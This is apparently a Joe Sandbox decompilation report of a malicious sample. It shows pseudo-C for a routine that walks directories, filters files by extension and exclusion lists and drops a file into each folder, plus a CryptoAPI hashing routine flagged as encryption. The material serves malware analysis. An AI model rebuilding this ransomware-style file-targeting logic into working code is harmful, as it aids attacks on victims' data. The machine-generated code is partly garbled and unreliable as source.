				signed int _t380;
				WCHAR* _t381;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(0x4cab09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0();
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4, 0);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796);
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4, 0);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204, 0);
													_v156 = 0;
													E00413B70(_a28,  &_v180);
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796);
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4, 0);
						_t374 = E0040F310(_t529, _t538);
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t457,  &_v128,  &_a4, 0);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128, 0);
								E0040F0E0(_t529);
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t48;
				int* _t49;
				char _t51;
				char _t53;
				char _t59;
				intOrPtr _t67;
				void* _t82;
				void* _t83;
				intOrPtr* _t89;
				void* _t94;
				void* _t95;
				int _t96;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;

				 *[fs:0x0] = _t102;
				_t103 = _t102 - 0x38;
				_v20 = _t103;
				_t83 = __ecx;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
				_t48 =  &_v32;
				_v8 = 1;
				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff);
				if(_t48 == 0) {
					_v40 = _t48;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t49 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
				if(_t49 == 0) {
					_v44 = _t49;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t51 =  >=  ? _a4 :  &_a4;
				__imp__CryptHashData(_v24, _t51, _a20, 0);
				if(_t51 == 0) {
					_v48 = _t51;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t99 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
				_t113 = _t53;
				if(_t53 == 0) {
					_v52 = _t53;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
				_v36 = _t96;
				E0042B420(_t96, 0, _v28 + 1);
				_t105 = _t103 + 0x10;
				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
				if(_t59 == 0) {
					_v56 = _t59;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t100 = 0;
				while(_t100 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
					_t105 = _t105 + 0xc;
					if(_v72 != 0) {
						_t89 =  &_v72;
						_t39 = _t89 + 1; // 0x1
						_t94 = _t39;
						do {
							_t67 =  *_t89;
							_t89 = _t89 + 1;
							__eflags = _t67;
						} while (_t67 != 0);
						_push(_t89 - _t94);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					} else {
						_push(0);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					}
					L20:
				}
				E00422110(_t96);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				__eflags = _a24 - 0x10;
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return 1;
				goto L20;
			}

0x0040e881
0x0040e888
0x0040e88e
0x0040e891
0x0040e895
0x0040e8a1
0x0040e8a8
0x0040e8af
0x0040e8b6
0x0040e8c6
0x0040e8c9
0x0040e8ce
0x0040e8d6
0x0040e8d8
0x0040e8e4
0x0040e8e4
0x0040e8e9
0x0040e8f9
0x0040e901
0x0040e903
0x0040e90f
0x0040e90f
0x0040e920
0x0040e928
0x0040e930
0x0040e932
0x0040e93e
0x0040e93e
0x0040e943
0x0040e956
0x0040e95d
0x0040e95f
0x0040e961
0x0040e963
0x0040e96f
0x0040e96f
0x0040e985
0x0040e987
0x0040e98e
